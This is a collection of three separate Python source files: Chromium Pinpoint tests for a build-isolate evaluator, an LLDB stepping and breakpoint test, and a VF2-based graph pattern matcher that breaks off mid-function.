},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
def testInitiate_ScheduleBuild(self, put, _):
# We then need to make sure that the buildbucket put was called.
put.return_value = {'build': {'id': '345982437987234'}}
# This time we don't seed the isolate for the change to force the build.
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
},
},
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'ongoing',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
def testUpdate_BuildSuccessful(self, put, get_build_status):
# First we're going to initiate so we have a build scheduled.
put.return_value = {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
},
},
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'ongoing',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
# Now we send an update event which should cause us to poll the status of
# the build on demand.
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"isolate_server": "https://isolate.server",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_job_status': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234',
'url': 'https://some.buildbucket/url'
}
},
'builder': 'Mac Builder',
'build_url': mock.ANY,
'change': mock.ANY,
'isolate_hash': '192923affe212adf',
'isolate_server': 'https://isolate.server',
'status': 'completed',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
self.assertEqual(
{
'find_isolate_chromium@7c7e90be': {
'completed':
True,
'exception':
None,
'details': [{
'key': 'builder',
'value': 'Mac Builder',
'url': None,
}, {
'key': 'build',
'value': '345982437987234',
'url': mock.ANY,
}, {
'key':
'isolate',
'value':
'192923affe212adf',
'url':
'https://isolate.server/browse?digest=192923affe212adf',
}]
}
},
task_module.Evaluate(
self.job,
event_module.Event(
type='unimportant', target_task=None, payload={}),
find_isolate.Serializer()))
@mock.patch('dashboard.services.buildbucket_service.GetJobStatus')
class FindIsolateEvaluatorUpdateTests(FindIsolateEvaluatorBase):
def setUp(self):
super(FindIsolateEvaluatorUpdateTests, self).setUp()
# Here we set up the pre-requisite for polling, where we've already had a
# successful build scheduled.
with mock.patch('dashboard.services.buildbucket_service.Put') as put:
put.return_value = {'build': {'id': '345982437987234'}}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'status': 'ongoing',
'builder': 'Mac Builder',
'bucket': 'luci.bucket',
'change': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='initiate',
target_task='find_isolate_chromium@7c7e90be',
payload={}), find_isolate.Evaluator(self.job)))
self.assertEqual(1, put.call_count)
def testUpdate_BuildFailed_HardFailure(self, get_build_status):
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'FAILURE',
'result_details_json': '{}',
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
},
},
'buildbucket_job_status': mock.ANY,
'builder': 'Mac Builder',
'build_url': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'target': 'telemetry_perf_tests',
'errors': [mock.ANY],
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
self.assertEqual(
{
'find_isolate_chromium@7c7e90be': {
'completed':
True,
'exception':
mock.ANY,
'details': [{
'key': 'builder',
'value': 'Mac Builder',
'url': None,
}, {
'key': 'build',
'value': '345982437987234',
'url': mock.ANY,
}]
}
},
task_module.Evaluate(
self.job,
event_module.Event(
type='unimportant', target_task=None, payload={}),
find_isolate.Serializer()))
def testUpdate_BuildFailed_Cancelled(self, get_build_status):
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'CANCELLED',
'result_details_json': '{}',
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': {
'status': 'COMPLETED',
'result': 'CANCELLED',
'result_details_json': '{}',
},
'build_url': mock.ANY,
'change': mock.ANY,
'errors': [mock.ANY],
'status': 'cancelled',
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Server(self, get_build_status):
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'builder': 'Mac Builder',
'build_url': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'tries': 1,
'target': 'telemetry_perf_tests',
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Revision(self, get_build_status):
json = """
{
"properties": {
"isolate_server": "https://isolate.server",
"swarm_hashes_refs/heads/master(at)7c7e90be_without_patch":
{"telemetry_perf_tests": "192923affe212adf"}
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'target': 'telemetry_perf_tests',
'tries': 1,
'errors': mock.ANY,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_Hashes(self, get_build_status):
json = """
{
"properties": {
"got_revision_cp": "refs/heads/master@7c7e90be",
"isolate_server": "https://isolate.server"
}
}"""
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'builder': 'Mac Builder',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'change': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_MissingIsolates_InvalidJson(self, get_build_status):
json = '{ invalid }'
get_build_status.return_value = {
'build': {
'status': 'COMPLETED',
'result': 'SUCCESS',
'result_details_json': json,
}
}
self.assertDictEqual(
{
'find_isolate_chromium@7c7e90be': {
'bucket': 'luci.bucket',
'build_url': mock.ANY,
'buildbucket_result': {
'build': {
'id': '345982437987234'
}
},
'buildbucket_job_status': mock.ANY,
'builder': 'Mac Builder',
'change': mock.ANY,
'status': 'failed',
'errors': mock.ANY,
'target': 'telemetry_perf_tests',
'tries': 1,
},
},
task_module.Evaluate(
self.job,
event_module.Event(
type='update',
target_task='find_isolate_chromium@7c7e90be',
payload={'status': 'build_completed'}),
find_isolate.Evaluator(self.job)))
self.assertEqual(1, get_build_status.call_count)
def testUpdate_BuildFailed_ScheduleRetry(self, *_):
self.skipTest('Not implemented yet.')
|
|
"""Test stepping over vrs. hitting breakpoints & subsequent stepping in various forms."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCStepping(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line numbers that we will step to in main:
self.main_source = "main.c"
@add_test_categories(['pyapi', 'basic_process'])
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr17932')
@expectedFailureAll(oslist=["linux"], bugnumber="llvm.org/pr14437")
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24777")
@expectedFailureNetBSD
def test_and_python_api(self):
"""Test stepping over vrs. hitting breakpoints & subsequent stepping in various forms."""
self.build()
exe = self.getBuildArtifact("a.out")
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
self.main_source_spec = lldb.SBFileSpec(self.main_source)
breakpoints_to_disable = []
break_1_in_main = target.BreakpointCreateBySourceRegex(
'// frame select 2, thread step-out while stopped at .c.1..',
self.main_source_spec)
self.assertTrue(break_1_in_main, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_1_in_main)
break_in_a = target.BreakpointCreateBySourceRegex(
'// break here to stop in a before calling b', self.main_source_spec)
self.assertTrue(break_in_a, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_a)
break_in_b = target.BreakpointCreateBySourceRegex(
'// thread step-out while stopped at .c.2..', self.main_source_spec)
self.assertTrue(break_in_b, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_b)
break_in_c = target.BreakpointCreateBySourceRegex(
'// Find the line number of function .c. here.', self.main_source_spec)
self.assertTrue(break_in_c, VALID_BREAKPOINT)
breakpoints_to_disable.append(break_in_c)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The stop reason of the thread should be breakpoint.
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_1_in_main)
if len(threads) != 1:
self.fail("Failed to stop at first breakpoint in main.")
thread = threads[0]
# Get the stop id and for fun make sure it increases:
old_stop_id = process.GetStopID()
# Now step over, which should cause us to hit the breakpoint in "a"
thread.StepOver()
# The stop reason of the thread should be breakpoint.
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_a)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in a.")
# Check that the stop ID increases:
new_stop_id = process.GetStopID()
self.assertTrue(
new_stop_id > old_stop_id,
"Stop ID increases monotonically.")
thread = threads[0]
# Step over, and we should hit the breakpoint in b:
thread.StepOver()
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_b)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in b.")
thread = threads[0]
# Now try running some function, and make sure that we still end up in the same place
# and with the same stop reason.
frame = thread.GetFrameAtIndex(0)
current_line = frame.GetLineEntry().GetLine()
current_file = frame.GetLineEntry().GetFileSpec()
current_bp = []
current_bp.append(thread.GetStopReasonDataAtIndex(0))
current_bp.append(thread.GetStopReasonDataAtIndex(1))
stop_id_before_expression = process.GetStopID()
stop_id_before_including_expressions = process.GetStopID(True)
frame.EvaluateExpression("(int) printf (print_string)")
frame = thread.GetFrameAtIndex(0)
self.assertTrue(
current_line == frame.GetLineEntry().GetLine(),
"The line stayed the same after expression.")
self.assertTrue(
current_file == frame.GetLineEntry().GetFileSpec(),
"The file stayed the same after expression.")
self.assertTrue(
thread.GetStopReason() == lldb.eStopReasonBreakpoint,
"We still say we stopped for a breakpoint.")
self.assertTrue(thread.GetStopReasonDataAtIndex(0) == current_bp[
0] and thread.GetStopReasonDataAtIndex(1) == current_bp[1], "And it is the same breakpoint.")
        # Also make sure running the expression didn't change the public stop id,
        # but did increment the stop id that counts expression stops as well.
stop_id_after_expression = process.GetStopID()
stop_id_after_including_expressions = process.GetStopID(True)
self.assertTrue(
stop_id_before_expression == stop_id_after_expression,
"Expression calling doesn't change stop ID")
self.assertTrue(
stop_id_after_including_expressions > stop_id_before_including_expressions,
"Stop ID including expressions increments over expression call.")
# Do the same thing with an expression that's going to crash, and make
# sure we are still unchanged.
frame.EvaluateExpression("((char *) 0)[0] = 'a'")
frame = thread.GetFrameAtIndex(0)
self.assertTrue(
current_line == frame.GetLineEntry().GetLine(),
"The line stayed the same after expression.")
self.assertTrue(
current_file == frame.GetLineEntry().GetFileSpec(),
"The file stayed the same after expression.")
self.assertTrue(
thread.GetStopReason() == lldb.eStopReasonBreakpoint,
"We still say we stopped for a breakpoint.")
self.assertTrue(thread.GetStopReasonDataAtIndex(0) == current_bp[
0] and thread.GetStopReasonDataAtIndex(1) == current_bp[1], "And it is the same breakpoint.")
# Now continue and make sure we just complete the step:
        # Disable all our breakpoints first - sometimes the compiler emits two line table entries
        # for the breakpoint at "b" and we don't want to hit that.
for bkpt in breakpoints_to_disable:
bkpt.SetEnabled(False)
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "a")
self.assertTrue(thread.GetStopReason() == lldb.eStopReasonPlanComplete)
# And one more time should get us back to main:
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "main")
self.assertTrue(thread.GetStopReason() == lldb.eStopReasonPlanComplete)
# Now make sure we can call a function, break in the called function,
# then have "continue" get us back out again:
frame = thread.GetFrameAtIndex(0)
frame = thread.GetFrameAtIndex(0)
current_line = frame.GetLineEntry().GetLine()
current_file = frame.GetLineEntry().GetFileSpec()
break_in_b.SetEnabled(True)
options = lldb.SBExpressionOptions()
options.SetIgnoreBreakpoints(False)
options.SetFetchDynamicValue(False)
options.SetUnwindOnError(False)
frame.EvaluateExpression("b (4)", options)
threads = lldbutil.get_threads_stopped_at_breakpoint(
process, break_in_b)
if len(threads) != 1:
self.fail("Failed to stop at breakpoint in b when calling b.")
thread = threads[0]
# So do a step over here to make sure we can still do that:
thread.StepOver()
# See that we are still in b:
func_name = thread.GetFrameAtIndex(0).GetFunctionName()
self.assertTrue(
func_name == "b",
"Should be in 'b', were in %s" %
(func_name))
# Okay, now if we continue, we will finish off our function call and we
# should end up back in "a" as if nothing had happened:
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(
0).GetLineEntry().GetLine() == current_line)
self.assertTrue(thread.GetFrameAtIndex(
0).GetLineEntry().GetFileSpec() == current_file)
# Now we are going to test step in targeting a function:
break_in_b.SetEnabled(False)
break_before_complex_1 = target.BreakpointCreateBySourceRegex(
'// Stop here to try step in targeting b.', self.main_source_spec)
self.assertTrue(break_before_complex_1, VALID_BREAKPOINT)
break_before_complex_2 = target.BreakpointCreateBySourceRegex(
'// Stop here to try step in targeting complex.', self.main_source_spec)
self.assertTrue(break_before_complex_2, VALID_BREAKPOINT)
break_before_complex_3 = target.BreakpointCreateBySourceRegex(
'// Stop here to step targeting b and hitting breakpoint.', self.main_source_spec)
self.assertTrue(break_before_complex_3, VALID_BREAKPOINT)
break_before_complex_4 = target.BreakpointCreateBySourceRegex(
'// Stop here to make sure bogus target steps over.', self.main_source_spec)
self.assertTrue(break_before_complex_4, VALID_BREAKPOINT)
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_1)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_1.SetEnabled(False)
thread.StepInto("b")
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "b")
# Now continue out and stop at the next call to complex. This time
# step all the way into complex:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_2)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_2.SetEnabled(False)
thread.StepInto("complex")
self.assertTrue(thread.GetFrameAtIndex(
0).GetFunctionName() == "complex")
# Now continue out and stop at the next call to complex. This time
# enable breakpoints in a and c and then step targeting b:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_3)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_3.SetEnabled(False)
break_at_start_of_a = target.BreakpointCreateByName('a')
break_at_start_of_c = target.BreakpointCreateByName('c')
thread.StepInto("b")
threads = lldbutil.get_stopped_threads(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(len(threads) == 1)
thread = threads[0]
stop_break_id = thread.GetStopReasonDataAtIndex(0)
self.assertTrue(stop_break_id == break_at_start_of_a.GetID()
or stop_break_id == break_at_start_of_c.GetID())
break_at_start_of_a.SetEnabled(False)
break_at_start_of_c.SetEnabled(False)
process.Continue()
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "b")
# Now continue out and stop at the next call to complex. This time
# enable breakpoints in a and c and then step targeting b:
threads = lldbutil.continue_to_breakpoint(
process, break_before_complex_4)
self.assertTrue(len(threads) == 1)
thread = threads[0]
break_before_complex_4.SetEnabled(False)
thread.StepInto("NoSuchFunction")
self.assertTrue(thread.GetFrameAtIndex(0).GetFunctionName() == "main")
|
|
import sys
from .himesis import Himesis
from .himesis_utils import standardize_name, is_RAM_attribute, to_non_RAM_attribute, get_preds_and_succs
from pyramify.ramify_actions import get_default_match_code
class Priority(object):
"""
Implements heuristics for the HimesisMatcher algorithm.
Determines the order in which the candidate pairs should be computed.
By default, the order is the index order of the nodes in igraph.
To refine this heuristic order, you should sub-class Priority and override its methods.
"""
def __init__(self):
"""
Implements heuristics for the HimesisMatcher algorithm.
Determines the order in which the candidate pairs should be computed.
By default, the order is the index order of the nodes in igraph.
To refine this heuristic order, you should sub-class Priority and override its methods.
"""
self.source_graph = None
self.pattern_graph = None
def cache_info(self, source_graph, pattern_graph):
"""
Pre-computes any information required by the order and order_all methods
@param source_graph: The source graph.
@param pattern_graph: The pattern graph.
"""
pass
def order_source(self, candidate_list):
"""
Specifies the order for the terminal sets for the source graph.
@param candidate_list: The list of possible candidates.
"""
return sorted(candidate_list)
def order_pattern(self, candidate_list):
"""
Specifies the order for the terminal sets for the pattern graph.
@param candidate_list: The list of possible candidates.
"""
return sorted(candidate_list)
def order_all_source(self, candidate_list):
"""
Specifies the order for all source nodes.
@param candidate_list: The list of possible candidates.
"""
return candidate_list
def order_all_pattern(self, candidate_list):
"""
Specifies the order for all pattern nodes.
@param candidate_list: The list of possible candidates.
"""
return candidate_list
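# Illustrative refinement of the default heuristics (sketch only): a Priority
# subclass that visits higher-degree pattern nodes first. Using igraph's
# degree() on self.pattern_graph is an assumption about how the matcher wires
# the graphs into the priority object.
class DegreePriority(Priority):
    """
    Orders pattern candidates by decreasing vertex degree so that the most
    constrained pattern nodes are matched first.
    """
    def order_all_pattern(self, candidate_list):
        return sorted(candidate_list,
                      key=lambda n: self.pattern_graph.degree(n),
                      reverse=True)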
class HimesisMatcher(object):
"""
Represents a pattern matching algorithm for typed attributed multi-graphs.
The pattern matching algorithm is based on VF2.
"""
    def __init__(self, source_graph, pattern_graph, pred1={}, succ1={}, pred2={}, succ2={}, superclasses_dict={}):
        """
        Represents a pattern matching algorithm for typed attributed multi-graphs.
        @param source_graph: The source graph.
        @param pattern_graph: The pattern graph.
        @param pred1: Pre-built dictionary of predecessors in the source graph.
        @param succ1: Pre-built dictionary of successors in the source graph.
        @param pred2: Pre-built dictionary of predecessors in the pattern graph.
        @param succ2: Pre-built dictionary of successors in the pattern graph.
        @param superclasses_dict: Maps each metamodel type to its superclasses, for subtype-aware matching.
        """
try:
src_eqs = source_graph["equations"]
except KeyError:
print("Graph has no equations array: " + source_graph.name)
src_eqs = []
try:
patt_eqs = pattern_graph["equations"]
except KeyError:
print("Graph has no equations array: " + pattern_graph.name)
patt_eqs = []
try:
patt_labels = pattern_graph.vs["MT_label__"]
except KeyError:
patt_labels = []
self.src_eqs_constant = {}
self.src_eqs_variable = []
for eq in src_eqs:
if eq[1][0] == "constant":
node_num = eq[0][0]
attr = eq[0][1]
try:
self.src_eqs_constant[node_num].append((attr, eq[1][1]))
except KeyError:
self.src_eqs_constant[node_num] = [(attr, eq[1][1])]
else:
self.src_eqs_variable.append(eq)
self.patt_eqs_constant = {}
self.patt_eqs_variable = []
for eq in patt_eqs:
if eq[1][0] == "constant":
node_label = str(eq[0][0])
attr = eq[0][1]
#print("Node label: " + str(node_label))
#print("Labels: " + str(patt_labels))
node_num = patt_labels.index(node_label)
try:
self.patt_eqs_constant[node_num].append((attr, eq[1][1]))
except KeyError:
self.patt_eqs_constant[node_num] = [(attr, eq[1][1])]
else:
self.patt_eqs_variable.append(eq)
# print("\n")
# print("Src constant eqs: " + str(self.src_eqs_constant))
# print("Src variable eqs: " + str(self.src_eqs_variable))
# print("Patt constant eqs: " + str(self.patt_eqs_constant))
# print("Patt variable eqs: " + str(self.patt_eqs_variable))
self.superclasses_dict = superclasses_dict
self.G1 = source_graph
self.G2 = pattern_graph
self.pred1 = pred1
self.succ1 = succ1
self.G1_vcount = self.G1.vcount()
self.G2_vcount = self.G2.vcount()
# removed priority for speed
#assert(isinstance(priority, Priority))
#self.priority = priority
#self.priority.source_graph = source_graph
#self.priority.pattern_graph = pattern_graph
# Set recursion limit
self.old_recursion_limit = sys.getrecursionlimit()
expected_max_recursion_level = self.G2_vcount
if self.old_recursion_limit < 1.5 * expected_max_recursion_level:
# Give some breathing room
sys.setrecursionlimit(int(1.5 * expected_max_recursion_level))
# Initialize the state
self.initialize()
# Check whether we are considering multi-graph
# if reduce(lambda x,y: x or y, self.G2.is_multiple()):
# self.cache_info_multi(self.G1_nodes, self.G2_nodes)
# Scan the two graphs to cache required information.
# Typically stores the results of expensive operation on the graphs.
# This speeds up the algorithm significantly.
# (disabled)
# self.cache_info()
# Memoize the predecessor & successor information:
# for each node store the number of neighbours and the list
#igraph.IN = 2, igraph.OUT = 1
if not self.pred1 or not self.succ1:
self.pred1, self.succ1 = get_preds_and_succs(self.G1)
self.pred2 = pred2
self.succ2 = succ2
if not self.pred2 or not self.succ2:
self.pred2, self.succ2 = get_preds_and_succs(self.G2)
self.has_super = None
if self.G1_vcount > 0 and self.G2_vcount > 0:
#keep track of the metamodels
self.mm1 = self.G1.vs["mm__"]
self.mm2 = [mm[8:] for mm in self.G2.vs["mm__"]]
if self.superclasses_dict:
self.src_has_supertype = [child_mm in self.superclasses_dict for child_mm in self.mm1]
else:
self.src_has_supertype = [False] * self.G1_vcount
#ignore an empty dictionary
if self.superclasses_dict:
self.has_super = [mm in self.superclasses_dict.keys() for mm in self.mm1]
def cache_info(self):
"""
Cache information on the nodes.
Typically stores the results of expensive operation on the graphs.
This speeds up the algorithm significantly.
"""
# Cache individual nodes
self.G1_nodes = self.G1.node_iter()
self.G2_nodes = self.G2.node_iter()
# Cache any further data used for the heuristic prioritization for computing the candidate pair
# This is done when initializing the priority class
self.priority.cache_info(self.G1, self.G2)
def reset_recursion_limit(self):
"""
Restores the recursion limit.
"""
sys.setrecursionlimit(self.old_recursion_limit)
def initialize(self):
"""
(Re)Initializes the state of the algorithm.
"""
#=======================================================================
# The algorithm is based on VF2.
# The following are the data-structures used:
# - M_1: the current partial mapping from G1 to G2
# - M_2: the current partial mapping from G2 to G1
# - T1_in: the in-neighbours of the nodes in M_1
# - T2_in: the in-neighbours of the nodes in M_2
# - T1_out: the out-neighbours of the nodes in M_1
# - T2_out: the out-neighbours of the nodes in M_2
#=======================================================================
# core_1[n] contains the index of the node m paired with n, if n is in the mapping
self.core_1 = {} # This is M_1
# core_2[m] contains the index of the node n paired with m, if m is in the mapping
self.core_2 = {} # This is M_2
# The value stored is the depth of the search tree when the node became part of the corresponding set
# Non-zero if n is in M_1 or in T_1^{in}
self.in_1 = {}
# Non-zero if n is in M_1 or in T_1^{out}
self.out_1 = {}
# Non-zero if m is in M_2 or in T_2^{in}
self.in_2 = {}
# Non-zero if m is in M_2 or in T_2^{out}
self.out_2 = {}
# To improve the performance, we also store the following vectors
# Non-zero if n is in M_1 or in T_1^{in} or in T_1^{out}
self.inout_1 = {}
# Non-zero if n is in M_2 or in T_2^{in} or in T_2^{out}
self.inout_2 = {}
# Prepare the necessary data structures required for backtracking
self.state = self.save()#HimesisMatcherState(self)
# Provide a convenient way to access the isomorphism mapping.
self.mapping = self.core_2.copy()
def are_compatibile(self, src_node, patt_node):
"""
Verifies if a candidate pair is compatible.
More specifically, verify degree and meta-model compatibility.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
"""
# WARNING:
# MOVED TO _MATCH FUNCTION!
# First check if they are of the same type
#if sourceNode["mm__"] == to_non_RAM_attribute(patternNode["mm__"]):
#Assumption: patternNode["mm__"] always starts with "MT_pre__"
#MT_pre taken off when creating self.mm2
#if sourceNode["mm__"] == patternNode["mm__"][8:]:
sourceMM = self.mm1[src_node]
targetMM = self.mm2[patt_node]
if sourceMM == targetMM:
# Then check for the degree compatibility
return (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0])
# Otherwise, first check for the degree compatibility
elif not (self.pred2[patt_node][0] <= self.pred1[src_node][0]
and self.succ2[patt_node][0] <= self.succ1[src_node][0]):
return False
if self.src_has_supertype[src_node]:
return targetMM in self.superclasses_dict[sourceMM]
#
# # Then check sub-types compatibility
# if self.patt_has_subtype[patt_node]:
# for subtype in self.G2.vs[patt_node]['MT_subtypes__']:
# if sourceMM == subtype[8:]:
# return True
return False
def candidate_pairs_iter(self):
"""
Iterator over candidate pairs of nodes in G1 and G2, according to the VF2 algorithm.
Degree and meta-model compatibility of each pair is checked afterwards in _match(), not here.
@return: The candidate pair (source node, pattern node)
"""
#=======================================================================
# Here we compute P(s) = (p1,p2) the candidate pair
# for the current partial mapping M(s).
#=======================================================================
# First try the nodes that are in both Ti_in and Ti_out
if len(self.inout_1) > len(self.core_1) and len(self.inout_2) > len(self.core_2):
for patt_node in sorted(self.inout_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.inout_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If T1_out and T2_out are both non-empty:
# P(s) = T1_out x {min T2_out}
elif len(self.out_1) > len(self.core_1) and len(self.out_2) > len(self.core_2):
for patt_node in sorted(self.out_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.out_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If T1_in and T2_in are both non-empty:
# P(s) = T1_in x {min T2_in}
elif len(self.in_1) > len(self.core_1) and len(self.in_2) > len(self.core_2):
for patt_node in sorted(self.in_2):
if patt_node not in self.core_2:
break
for src_node in sorted(self.in_1):
if src_node not in self.core_1:
yield src_node, patt_node
# If all terminal sets are empty:
# P(s) = (N_1 - M_1) x {min (N_2 - M_2)}
else:
for patt_node in range(self.G2_vcount):
if patt_node not in self.core_2:
break
for src_node in range(self.G1_vcount):
if src_node not in self.core_1:
yield src_node, patt_node
def are_syntactically_feasible(self, src_node, patt_node):
"""
Determines whether the two nodes are syntactically feasible,
i.e., it ensures that adding this candidate pair does not make it impossible to find a total mapping.
@param src_node: The candidate from the source graph.
@param patt_node: The candidate from the pattern graph.
@return: True if they are syntactically feasible, False otherwise.
"""
#=======================================================================
# The syntactic feasibility considers the topology of the two graphs.
# It verifies that edges directly or indirectly connected to M(s + P(s))
# does not violate the subgraph matching conditions.
#=======================================================================
# Check for self-loops
# e1, e2 = -1, -1
# if patt_node in self.succ2[patt_node] or patt_node in self.pred2[patt_node]:
# if src_node in self.succ1[src_node] or src_node in self.pred1[src_node]:
# e1 = self.G1.get_eid(src_node, src_node)
# e2 = self.G2.get_eid(patt_node, patt_node)
# if self.G1.count_multiple(e1) < self.G2.count_multiple(e2):
# return False
# else:
# return False
# Counters for in and out edges found
in1 = 0
in2 = 0
out1 = 0
out2 = 0
inout1 = 0
inout2 = 0
# Checks if successors are compatible
for successor2 in self.succ2[patt_node][1]:
#tmp = self.G2.predecessors(successor2)
# tmp = self.pred2[successor2][1]
# self.pred2[successor2] = (len(tmp), tmp)
# tmp = self.G2.successors(successor2)
# self.succ2[successor2] = (len(tmp), tmp)
if successor2 not in self.core_2:
for successor1 in self.succ1[src_node][1]:
# tmp = self.G1.predecessors(successor1)
# self.pred1[successor1] = (len(tmp), tmp)
# tmp = self.G1.successors(successor1)
# self.succ1[successor1] = (len(tmp), tmp)
if (self.succ2[successor2][0] <= self.succ1[successor1][0]
and self.pred2[successor2][0] <= self.pred1[successor1][0]
and successor1 not in self.core_1):
break
else:
return False
# They are compatible, so update the counters of the pattern node
if self.pred2[successor2][1]:
in2 += 1
